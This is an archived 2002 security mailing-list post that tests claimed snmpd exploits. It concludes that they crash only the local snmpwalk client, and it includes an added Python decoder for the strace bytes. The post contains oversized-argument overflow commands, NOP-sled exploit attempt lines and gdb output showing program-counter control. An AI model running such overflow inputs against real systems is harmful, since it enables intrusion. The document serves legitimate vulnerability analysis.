Vulnerability Development mailing list archives
snmpd exploit examination - snmpwalk
From: KF <dotslash () snosoft com>
Date: Wed, 20 Feb 2002 16:14:50 -0500
I am not so sure about those proof of concept remote snmp exploits that were posted... they look more like
local exploits to me.
[root@linuxppc root]# ps -ef | grep snmp
root 6355 1 17 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null
(gdb) r 127.0.0.1 public `perl -e 'print "A" x 293'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 293'`
Program received signal SIGSEGV, Segmentation fault.
0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
(gdb) bt
#0 0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
#1 0x0ff99358 in snmp_parse_oid () from /usr/lib/libsnmp-0.4.2.1.so
#2 0x10000e28 in _init ()
#3 0x0fc6eb90 in __libc_start_main () from /lib/libc.so.6
(gdb) r 127.0.0.1 public `perl -e 'print "A" x 308'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 308'`
Program received signal SIGILL, Illegal instruction.
0x41414100 in ?? ()
(gdb) r 127.0.0.1 public `perl -e 'print "A" x 309'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'`
Program received signal SIGILL, Illegal instruction.
0x41414140 in ?? ()
This is snmpwalk NOT snmpd dying...
[root@linuxppc root]# ps -ef | grep snmp
root 6355 1 5 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null
Still running...
Ok, let's use a newer version of snmpwalk
[root@linuxppc ucd-snmp-4.2.2]# apps/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
Unknown Object Identifier
(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
[root@linuxppc root]# ps -ef | grep snmp
root 6355 1 4 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null
still running...
These are the examples I have seen in various emails as methods to exploit snmpd... These seem to do
nothing on my box to the client or the daemon...
snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`
execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);
execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);
Here are my results.
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c `perl -e 'print "A" x 256'`
Timeout: No Response from 127.0.0.1
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 450'`
Timeout: No Response from 127.0.0.1
[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 `perl -e 'print "A" x 4050'`
Timeout: No Response from 127.0.0.1
Additional findings.
[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 public `perl -e 'print "A" x 4050'`
Segmentation fault
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c public `perl -e 'print "A" x 4050'`
Segmentation fault
Meanwhile the daemon reads the requests with no problems...
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238429, 731763}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238430, 739274}, NULL) = 0
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 3999'`
Timeout: No Response from 127.0.0.1
[0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037
[0fc142b4] gettimeofday({1014238568, 885323}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037
Give it too many chars and snmpwalk complains.
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 5000'`
snmpwalk: Error building ASN.1 representation
Again YOUR results may vary ... these are mine.
-KF
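The strace output in the post above shows the daemon's recvfrom() returning 494 and 4037 bytes, and the first bytes of each buffer carry the ASN.1 BER headers of the SNMP message (outer SEQUENCE, version INTEGER, community OCTET STRING). The following Python script is an added example, not KF's code or anything from the ucd-snmp project: it decodes those BER tag/length headers and reconciles the declared lengths with the byte counts strace reported, which is the quick check a defender would use to confirm that the daemon received complete, well-formed messages rather than something that should have upset its parser. The two sample buffers are the prefixes printed in the strace lines above (the trailing "..." in strace means only the first bytes are shown, so only the headers are decoded here); the function and variable names are my own.

```python
# Added example (not from the original post). Decode the leading ASN.1 BER
# TLV headers of an SNMP message and compare the declared total length with
# the byte count recvfrom() reported.

# Constructed from the strace output quoted in the post: these are the byte
# prefixes strace printed (octal escapes), not full packets.
STRACE_BUF_494 = b"0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"
STRACE_BUF_4037 = b"0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"


def read_tlv_header(buf, pos):
    """Return (tag, length, header_size) for the BER TLV starting at buf[pos].

    Handles the short form (length byte < 0x80) and the definite long form
    (0x80 | n, followed by n big-endian length bytes). Indefinite length
    (0x80) is rejected because SNMP does not permit it.
    """
    if pos + 1 >= len(buf):
        raise ValueError("truncated: tag or length byte missing")
    tag = buf[pos]
    first = buf[pos + 1]
    if first < 0x80:
        return tag, first, 2
    n = first & 0x7F
    if n == 0 or n > 4:
        raise ValueError("indefinite or oversized length form not allowed in SNMP")
    length_bytes = buf[pos + 2:pos + 2 + n]
    if len(length_bytes) != n:
        raise ValueError("truncated: long-form length field incomplete")
    return tag, int.from_bytes(length_bytes, "big"), 2 + n


def summarize_snmp_prefix(buf, reported_len):
    """Parse the SEQUENCE, version INTEGER and community OCTET STRING headers.

    Returns the declared total message size, the SNMP version byte
    (0 means SNMPv1), the declared community-string length, and whether the
    declared size agrees with what recvfrom() returned.
    """
    tag, msg_len, hdr = read_tlv_header(buf, 0)
    if tag != 0x30:
        raise ValueError("expected outer SEQUENCE tag 0x30")
    pos = hdr
    vtag, vlen, vhdr = read_tlv_header(buf, pos)
    if vtag != 0x02 or vlen != 1:
        raise ValueError("expected a 1-byte INTEGER version field")
    version = buf[pos + vhdr]
    pos += vhdr + vlen
    ctag, clen, _ = read_tlv_header(buf, pos)
    if ctag != 0x04:
        raise ValueError("expected OCTET STRING community field")
    declared_total = hdr + msg_len
    return {
        "declared_total": declared_total,
        "version": version,
        "community_len": clen,
        "matches_recvfrom": declared_total == reported_len,
    }


if __name__ == "__main__":
    for name, buf, seen in (("494-byte read", STRACE_BUF_494, 494),
                            ("4037-byte read", STRACE_BUF_4037, 4037)):
        print(name, summarize_snmp_prefix(buf, seen))
```

Running it shows the 4037-byte message declares a 3999-byte community string, i.e. exactly the `"\x90" x 3999` argument from the post, wrapped in valid BER length encoding; the declared sizes match the recvfrom() counts in both cases, which is consistent with the daemon simply parsing oversized but well-formed requests.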
